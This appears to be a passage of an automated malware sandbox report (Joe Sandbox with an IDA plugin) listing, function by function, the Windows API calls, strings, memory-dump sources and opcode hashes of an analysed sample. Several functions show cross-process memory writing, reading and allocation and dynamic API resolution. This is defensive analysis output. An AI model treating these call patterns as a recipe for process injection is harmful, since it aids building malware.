                                                                        • Opcode ID: dfa1dcb62465d8d65928108244b72395c891f00e08a23984d3492f2e9a43cb55
                                                                        • Instruction ID: ab94264a70d272a5ec707cb0a3b5aaa59a6d87953f6eaa961eba7e5bd2c41c24
                                                                        • Opcode Fuzzy Hash: dfa1dcb62465d8d65928108244b72395c891f00e08a23984d3492f2e9a43cb55
                                                                        • Instruction Fuzzy Hash: 67A135356043059FCB14DF24C484E6ABBE9FF89314F148998F99A9B3A1CB31ED45CB92
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 009132ED
                                                                          • Part of subcall function 0091E0D0: __87except.LIBCMT ref: 0091E10B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHandling__87except__start
                                                                        • String ID: pow
                                                                        • API String ID: 2905807303-2276729525
                                                                        • Opcode ID: 895cf245700e89bd6b4b12c2cd1418f698df8e7f16e2811860227f23b894fe97
                                                                        • Instruction ID: 9429f91794b782c4ff42b85f6f678931e6b5c533ea412bdf1006ef6c868e9e95
                                                                        • Opcode Fuzzy Hash: 895cf245700e89bd6b4b12c2cd1418f698df8e7f16e2811860227f23b894fe97
                                                                        • Instruction Fuzzy Hash: E9513931B1C20E96DB15B714C9513FA6BAC9B81710F60CD28F8B5822A9DF398DC5A746
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0098DC50,?,0000000F,0000000C,00000016,0098DC50,?), ref: 00934645
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 009346C5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper$__itow__swprintf
                                                                        • String ID: REMOVE$THIS
                                                                        • API String ID: 3797816924-776492005
                                                                        • Opcode ID: abaf51541422fa3e1654c4c856ad730b2406985badfa549adb3305d7e1dea04a
                                                                        • Instruction ID: 54b9e0eb9482ff3527e50d36b51bc64ab5754556a364514cb617d39b3013d5ad
                                                                        • Opcode Fuzzy Hash: abaf51541422fa3e1654c4c856ad730b2406985badfa549adb3305d7e1dea04a
                                                                        • Instruction Fuzzy Hash: 82415E34A002199FCF00EF68C885ABEB7B5FF49314F158469E916AB392DB34AD45CF51
                                                                        APIs
                                                                          • Part of subcall function 0093430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0092BC08,?,?,00000034,00000800,?,00000034), ref: 00934335
                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0092C1D3
                                                                          • Part of subcall function 009342D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0092BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00934300
                                                                          • Part of subcall function 0093422F: GetWindowThreadProcessId.USER32(?,?), ref: 0093425A
                                                                          • Part of subcall function 0093422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0092BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0093426A
                                                                          • Part of subcall function 0093422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0092BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00934280
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0092C240
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0092C28D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                        • String ID: @
                                                                        • API String ID: 4150878124-2766056989
                                                                        • Opcode ID: 4a009c9f4eb8e52e1877f7bf458cab207d0b4d476667e50ca238274e3b20ab48
                                                                        • Instruction ID: 4ad16165dcafa80ce86edfa08a9b46f2cd9c093419aa2f69f52aa31f040bc2a0
                                                                        • Opcode Fuzzy Hash: 4a009c9f4eb8e52e1877f7bf458cab207d0b4d476667e50ca238274e3b20ab48
                                                                        • Instruction Fuzzy Hash: 1B4139B2900218AEDB10EBA4CD81BEEB7B8AF49300F114095FA55B7191DA71AE85CB61
                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0098DC00,00000000,?,?,?,?), ref: 0095A6D8
                                                                        • GetWindowLongW.USER32 ref: 0095A6F5
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0095A705
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long
                                                                        • String ID: SysTreeView32
                                                                        • API String ID: 847901565-1698111956
                                                                        • Opcode ID: 0efc8430a601a407051234b4ffdb6f0600dea8dd76c6cc56835d4744b88c36a4
                                                                        • Instruction ID: 5226383295e94deab8f029f90de024d09421e73a0520a78dd2d81995a773edcd
                                                                        • Opcode Fuzzy Hash: 0efc8430a601a407051234b4ffdb6f0600dea8dd76c6cc56835d4744b88c36a4
                                                                        • Instruction Fuzzy Hash: CA31CD3160120AAFDB218E39CC41BEA77A9FF89334F244714F975932E0C731A8549B94
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0095A15E
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0095A172
• SendMessageW.USER32(?,00001002,00000000,?), ref: 0095A196
Strings
Memory Dump Source
• Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0095A941
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0095A94F
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0095A956
Strings
Memory Dump Source
• Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00959A30
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00959A40
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00959A65
Strings
Memory Dump Source
• Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0095A46D
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0095A482
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0095A48F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00912350,?), ref: 009122A1
• GetProcAddress.KERNEL32(00000000), ref: 009122A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RoInitialize$combase.dll
• API String ID: 2574300362-340411864
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00912276), ref: 00912376
• GetProcAddress.KERNEL32(00000000), ref: 0091237D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 2574300362-2819208100
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,008F42EC,?,008F42AA,?), ref: 008F4304
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008F4316
Strings
Memory Dump Source
• Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,009521FB,?,009523EF), ref: 00952213
• GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00952225
Strings
Memory Dump Source
• Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetProcessId$kernel32.dll
• API String ID: 2574300362-399901964
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,008F41BB,008F4341,?,008F422F,?,008F41BB,?,?,?,?,008F39FE,?,00000001), ref: 008F4359
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008F436B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
APIs
• LoadLibraryA.KERNEL32(oleaut32.dll,?,0093051D,?,009305FE), ref: 00930547
• GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00930559
Strings
Memory Dump Source
• Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegisterTypeLibForUser$oleaut32.dll
• API String ID: 2574300362-1071820185
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0093052F,?,009306D7), ref: 00930572
                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00930584
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                        • API String ID: 2574300362-1587604923
                                                                        • Opcode ID: 8772c2ebdcd0f93c9fa9f4eb5cb45235d2c4b25fedbb2cf4e94d193fad296410
                                                                        • Instruction ID: 2c72bb05ef554627c7a6b6e93d618f7ef659cabecdd1d036ea6fa02bd0a7441a
                                                                        • Opcode Fuzzy Hash: 8772c2ebdcd0f93c9fa9f4eb5cb45235d2c4b25fedbb2cf4e94d193fad296410
                                                                        • Instruction Fuzzy Hash: 97D0A7325183129FC7205F35E809B027BF8AF45314F50841DF845D2150D770C8C0CE60
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0094ECBE,?,0094EBBB), ref: 0094ECD6
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0094ECE8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                        • API String ID: 2574300362-1816364905
                                                                        • Opcode ID: cf612eff72676c4c799a06cbc079756310289567a7cf592fcdb5ee496cc0c9ed
                                                                        • Instruction ID: 6b39677dfa655a24bf44e5cbded8ddd99f8ed7bd885ea6654eb1151c74e7e328
                                                                        • Opcode Fuzzy Hash: cf612eff72676c4c799a06cbc079756310289567a7cf592fcdb5ee496cc0c9ed
                                                                        • Instruction Fuzzy Hash: 2DD0A7314187239FCF245F65E888A0277F8BF45315B108419FC89D2191DBB0C8C0D750
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0094BAD3,00000001,0094B6EE,?,0098DC00), ref: 0094BAEB
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0094BAFD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                        • API String ID: 2574300362-199464113
                                                                        • Opcode ID: 887ac2ce6f3cc951012dd9ba20e6b5f2cc94b289b71d1936c1c30fba30082a1b
                                                                        • Instruction ID: 00b47632ba47bb661711b6eff34426217ffd2c1bbb8a8b5532b66cae81af377a
                                                                        • Opcode Fuzzy Hash: 887ac2ce6f3cc951012dd9ba20e6b5f2cc94b289b71d1936c1c30fba30082a1b
                                                                        • Instruction Fuzzy Hash: 50D0A9318187229FCB345F26E848F1277E8EF41318B10842AE88BE2250EBB0C8C0CB90
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00953BD1,?,00953E06), ref: 00953BE9
                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00953BFB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                        • API String ID: 2574300362-4033151799
                                                                        • Opcode ID: 1782cde424668c0ed94d93f29f0dd10810af048adcad516ed0ed4d198a75f5fd
                                                                        • Instruction ID: a5caa4c5fc5e3020785b852bbe358ac5e597a5cf26cc19ff3a27cc0f6a88e38d
                                                                        • Opcode Fuzzy Hash: 1782cde424668c0ed94d93f29f0dd10810af048adcad516ed0ed4d198a75f5fd
                                                                        • Instruction Fuzzy Hash: 43D0A771418752EFC7209F61E808607BBF8AF42329B108469EC89E2150D6F0C4C4CF50
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0090DF7F,?,0090DEA0,0098DC38,?,?), ref: 0090DF97
                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0090DFA9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: IsWow64Process$kernel32.dll
                                                                        • API String ID: 2574300362-3024904723
                                                                        • Opcode ID: 4a597ecd46b57e89297e1ee4b951e50644cc5730e22892cd6bb835a58188e7ef
                                                                        • Instruction ID: 385c2591f4249cffbd30d12cdff767bd7641ed32ff0e65480314314745b3f65c
                                                                        • Opcode Fuzzy Hash: 4a597ecd46b57e89297e1ee4b951e50644cc5730e22892cd6bb835a58188e7ef
                                                                        • Instruction Fuzzy Hash: B5D0A73142D7139FC7344F64E808602BBE8AF01324B50C42DEC46D2290D770CCC0C790
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2dee56bffeba2b5ff479a9890d49d5a2b916b3e8ea6cb73680691d4ccfd3a69b
                                                                        • Instruction ID: 88a446f471d4f22452a50769c71ea53c7fb68b8634ffb8b1d250f02ea2240b71
                                                                        • Opcode Fuzzy Hash: 2dee56bffeba2b5ff479a9890d49d5a2b916b3e8ea6cb73680691d4ccfd3a69b
